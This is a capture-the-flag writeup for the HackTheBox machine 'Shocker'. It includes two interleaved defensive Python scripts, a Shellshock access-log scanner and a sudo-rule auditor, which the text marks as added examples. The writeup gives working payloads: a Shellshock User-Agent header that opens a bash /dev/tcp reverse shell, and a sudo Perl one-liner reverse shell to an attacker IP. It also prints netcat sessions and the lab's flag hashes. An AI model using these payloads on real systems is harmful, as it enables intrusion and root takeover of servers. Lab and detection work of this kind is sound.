HackTheBox Shocker

Writeup for HackTheBox Shocker

Machine Synopsis

Shocker, while fairly simple overall, demonstrates the severity of the renowned Shellshock exploit, which affected millions of public-facing servers. (Source)

Key exploitation techniques:

  • Shellshock vulnerability (CVE-2014-6271) in CGI script
  • Remote Code Execution (RCE) via HTTP header injection
  • sudo misconfiguration (NOPASSWD for perl)
  • Perl reverse shell for root access

Enumeration

$ nmap -sC -sV -A 10.10.10.56

PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.18 (Ubuntu)
2222/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
|   256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_  256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)

The scan identified Apache HTTPD on port 80 and SSH on port 2222.

(Screenshot: the website on port 80)

dirsearch was used to find hidden directories on the web server.

$ dirsearch -u 10.10.10.56 -w /usr/share/dirb/wordlists/common.txt
...
[20:21:30] 403 -  294B  - /cgi-bin/
...

The /cgi-bin/ directory returned a 403 Forbidden status, which shows that the directory exists but that directory listing is disabled. dirsearch was then run specifically against /cgi-bin/ with common script extensions.

$ dirsearch -u http://10.10.10.56/cgi-bin -w /usr/share/dirb/wordlists/common.txt -f -e sh,cgi,bash
...
[20:29:19] 200 -  119B  - /cgi-bin/user.sh
...

The user.sh script was found. Retrieving its content confirmed it was a CGI script.

$ curl 10.10.10.56/cgi-bin/user.sh
Content-Type: text/plain

Just an uptime test script

 07:31:03 up 30 min,  0 users,  load average: 0.00, 0.02, 0.00

Exploitation

Shellshock RCE (shelly)

Research into “cgi bin exploits” and the machine name “Shocker” pointed to the Shellshock vulnerability (CVE-2014-6271). Affected versions of Bash execute any commands appended after a function definition stored in an environment variable, and a CGI server exports request headers such as User-Agent into the script's environment, so a crafted HTTP header becomes command injection when the CGI script is run by a vulnerable Bash.

(Screenshot: the request in Burp)

A malicious User-Agent header was crafted to execute a reverse shell payload.

# Malicious User-Agent header
User-Agent: () { :; }; echo; /bin/bash -c "exec bash -i &>/dev/tcp/<ATTACKER_IP>/<PORT> <&1"

A netcat listener was set up on the attacking machine. The HTTP request to http://10.10.10.56/cgi-bin/user.sh was sent with the crafted User-Agent header (e.g., via curl or Burp Repeater).
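From the defender's side, the same header pattern is what an access-log review or a pre-CGI header check should flag. The following script is an added example, not part of the original writeup: it parses Apache combined-format log lines (the sample lines are constructed, not from the target) and reports any User-Agent or Referer value that starts with the Shellshock function-definition marker, noting whether the request hit /cgi-bin/ where the value would actually have reached Bash.

```python
import re

# Shellshock (CVE-2014-6271) marker: a value that starts with a Bash function
# definition "() { ... }" followed by ";" and trailing text. Affected Bash
# versions executed that trailing text while importing the environment, and
# CGI hands request headers to the script as environment variables
# (User-Agent becomes HTTP_USER_AGENT), which is the injection point.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{[^}]*\}\s*;")

# Apache "combined" log format; the quoted Referer and User-Agent fields may
# contain backslash-escaped quotes, which the alternation handles.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) '
    r'"(?P<referer>(?:[^"\\]|\\.)*)" "(?P<ua>(?:[^"\\]|\\.)*)"$'
)

# Constructed sample log lines (not taken from the writeup); the second and
# third carry Shellshock-style User-Agent values.
SAMPLE_LOG = r'''
10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /cgi-bin/user.sh HTTP/1.1" 200 119 "-" "Mozilla/5.0"
10.0.0.9 - - [01/Jan/2024:10:00:05 +0000] "GET /cgi-bin/user.sh HTTP/1.1" 200 119 "-" "() { :; }; echo; /bin/bash -c \"id\""
10.0.0.9 - - [01/Jan/2024:10:00:07 +0000] "GET /index.html HTTP/1.1" 200 137 "-" "() { :;}; /bin/ping -c 1 10.0.0.9"
'''


def scan_headers(headers):
    """Return the names of request headers whose value carries a Shellshock marker.

    Usable as a pre-check in front of any CGI handler: every header is exported
    to the CGI environment, so every header is a candidate carrier.
    """
    return [name for name, value in headers.items() if SHELLSHOCK_RE.search(value)]


def scan_access_log(text):
    """Parse combined-format log lines and return one finding per hit."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        req = m.group("req")
        path = req.split(" ")[1] if " " in req else req
        for field in ("ua", "referer"):
            value = m.group(field)
            if SHELLSHOCK_RE.search(value):
                findings.append({
                    "ip": m.group("ip"),
                    "path": path,
                    "field": "User-Agent" if field == "ua" else "Referer",
                    "value": value,
                    # hits against /cgi-bin/ are the ones that could have executed
                    "cgi_target": path.startswith("/cgi-bin/"),
                })
    return findings


if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_LOG):
        print(f"{f['ip']} -> {f['path']} via {f['field']} (cgi={f['cgi_target']}): {f['value']}")
```

Detection is the second line of defence; the fix is a patched Bash, which only imports functions from specially named environment variables and no longer executes text that follows the function body, together with not exposing unneeded CGI scripts at all.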

# On attacker, set up Netcat listener
$ nc -nlvp 1337
listening on [any] 1337 ...

# Reverse shell received
connect to [10.10.14.25] from (UNKNOWN) [10.10.10.56] 44040
bash: no job control in this shell

shelly@Shocker:/usr/lib/cgi-bin$ whoami
shelly

This granted a reverse shell as shelly. The user.txt flag was retrieved.

shelly@Shocker:/usr/lib/cgi-bin$ cd /home/shelly
shelly@Shocker:/home/shelly$ cat user.txt
2ec24e11320026d1e70ff3e16695b233

Privilege Escalation

Sudo perl Abuse (root)

sudo -l was executed to check shelly’s privileges.

shelly@Shocker:/home/shelly$ sudo -l
sudo -l
Matching Defaults entries for shelly on Shocker:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User shelly may run the following commands on Shocker:
    (root) NOPASSWD: /usr/bin/perl

The output indicated that shelly could run /usr/bin/perl as root without a password. Because an interpreter can spawn any process, a NOPASSWD rule for it is equivalent to unrestricted root; this is a common sudo misconfiguration that can be abused for root access.
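An auditor reviewing sudo rules wants exactly this class of entry flagged automatically. The script below is an added example, not code from the writeup: it parses `sudo -l` output (the sample is the listing above plus two constructed entries, a fixed systemctl invocation and an `ALL` rule, so that a benign rule sits next to the dangerous ones) and reports rules that grant an interpreter, a shell or `ALL`, rating them critical when NOPASSWD applies.

```python
import os
import re

# Interpreters and shells: any of these run as root via sudo is equivalent to
# unrestricted root, because each can spawn an arbitrary process.
INTERPRETERS = {
    "perl", "python", "python2", "python3", "ruby", "lua", "node", "php",
    "sh", "bash", "dash", "zsh", "ksh",
}

# One "(runas) [TAG: ...] command[, command...]" line from the sudo -l listing.
ENTRY_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$")
USER_RE = re.compile(r"^User (?P<user>\S+) may run the following commands")

# Sample input: the listing from the writeup, plus two constructed entries
# (the systemctl and "ALL" lines) to show a benign rule next to a critical one.
SAMPLE_SUDO_L = """\
Matching Defaults entries for shelly on Shocker:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin

User shelly may run the following commands on Shocker:
    (root) NOPASSWD: /usr/bin/perl
    (root) /usr/bin/systemctl restart apache2
    (ALL : ALL) NOPASSWD: ALL
"""


def audit_sudo_l(text):
    """Return the rules in a `sudo -l` listing that hand out a root shell."""
    findings = []
    user = None
    in_rules = False
    for line in text.splitlines():
        um = USER_RE.match(line)
        if um:
            user, in_rules = um.group("user"), True
            continue
        if not in_rules:
            continue
        m = ENTRY_RE.match(line)
        if not m:
            continue
        runas = m.group("runas").split(":")[0].strip()  # "(root)" or "(ALL : ALL)"
        nopasswd = "NOPASSWD:" in m.group("tags")
        for cmd in (c.strip() for c in m.group("cmds").split(",")):
            binary = os.path.basename(cmd.split(" ")[0])
            if cmd == "ALL":
                reason = "any command"
            elif binary in INTERPRETERS:
                reason = f"{binary} can spawn arbitrary processes"
            else:
                continue  # e.g. a fixed systemctl invocation: worth review, but not a shell
            findings.append({
                "user": user, "runas": runas, "command": cmd,
                "nopasswd": nopasswd, "reason": reason,
                "severity": "critical" if nopasswd else "high",
            })
    return findings


if __name__ == "__main__":
    for f in audit_sudo_l(SAMPLE_SUDO_L):
        print(f"[{f['severity']}] {f['user']} -> ({f['runas']}) {f['command']}: {f['reason']}")
```

The remediation for a flagged rule is to remove it, or to replace the interpreter with a fixed, argument-free wrapper script that does only the one task the user needs.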

A Perl reverse shell payload was crafted to be executed directly via sudo /usr/bin/perl.

# Perl reverse shell payload
sudo /usr/bin/perl -e 'use Socket;$i="<ATTACKER_IP>";$p=<PORT>;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

A netcat listener was set up on the attacking machine.

# On attacker, set up Netcat listener
$ nc -nlvp 6969
listening on [any] 6969 ...

The Perl payload was executed from the shelly shell.

shelly@Shocker:/home/shelly$ sudo /usr/bin/perl -e 'use Socket;$i="10.10.14.25";$p=6969;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

# Reverse shell received
connect to [10.10.14.25] from (UNKNOWN) [10.10.10.56] 41834
/bin/sh: 0: can't access tty; job control turned off
# whoami
root

This successfully granted a root shell. The root.txt flag was retrieved.

# cd /root
# cat root.txt
52c2715605d70c7619030560dc1ca467

This post is licensed under CC BY 4.0 by the author.